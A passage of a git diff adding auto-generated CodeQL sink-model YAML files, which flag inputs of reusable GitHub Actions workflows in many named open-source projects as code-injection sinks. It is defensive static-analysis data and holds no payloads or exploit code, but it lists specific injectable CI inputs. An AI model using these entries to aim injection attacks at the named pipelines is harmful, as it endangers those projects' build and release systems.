@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml new file mode 100644 index 000000000000..69cb39e5e555 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml new file mode 100644 index 000000000000..a66e2a2cca53 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY_COMPOSE", "code-injection", "generated"] + - 
["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml new file mode 100644 index 000000000000..ca3eeca8df70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml new file mode 100644 index 000000000000..b95ce03ed3a4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml new file mode 100644 index 000000000000..326d4391ecb5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "inputs.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml new file mode 100644 index 000000000000..849a531cd7bc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml new file mode 100644 index 000000000000..835bbf4cf895 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml new file mode 100644 index 000000000000..453c3cd06f3a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "inputs.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml new file mode 100644 index 000000000000..32e6124c06ea --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "inputs.container-runtime", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml new file mode 100644 index 000000000000..09177714b081 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "inputs.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml new file mode 100644 index 000000000000..78243b4c6d73 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml new file mode 100644 index 000000000000..6e69fb89fc87 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "inputs.testScript", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml new file mode 100644 index 000000000000..fee19d65a097 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "inputs.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml new file mode 100644 index 000000000000..51b58ab74f58 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml new file mode 100644 index 000000000000..5a53b788312c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml new file mode 100644 index 000000000000..579e295213bf --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml new file mode 100644 index 000000000000..bc8133b907c6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml new file mode 100644 index 000000000000..232c6abb3f33 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml 
@@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "inputs.apis", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml new file mode 100644 index 000000000000..8a7d3c60c452 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "inputs.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml new file mode 100644 index 000000000000..a1e523d92cec --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "inputs.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml new file mode 100644 index 000000000000..22729c980dea --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "inputs.pattern", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml new file mode 100644 index 000000000000..e242d38bdbe1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "inputs.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "inputs.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "inputs.component", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml new file mode 100644 index 000000000000..f9c6658f5b8d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml new file mode 100644 index 000000000000..798c6bcc37a3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "inputs.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml new file mode 100644 index 000000000000..687db46824ac --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml new file mode 100644 index 000000000000..8a13569af7c9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "inputs.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml new file mode 100644 index 000000000000..453eb862b94a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml new file mode 100644 index 000000000000..37074688f173 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "inputs.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml new file mode 100644 index 000000000000..2e1835cadcad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "inputs.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml new file mode 100644 index 000000000000..924f5eb157c9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 000000000000..1244f76cbf1f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml new file mode 100644 index 000000000000..94c6c81d33ec --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml new file mode 100644 index 000000000000..c5f5fc4b29d7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml new file mode 100644 index 000000000000..506dd2b9fee2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml new file mode 100644 index 000000000000..4a81c585259a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.working-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml new file mode 100644 index 000000000000..d62c86e1129e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml new file mode 100644 index 000000000000..8aedf9000a06 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "inputs.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml new file mode 100644 index 000000000000..b14f14538b81 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.package-names-command", "code-injection", "generated"] + - 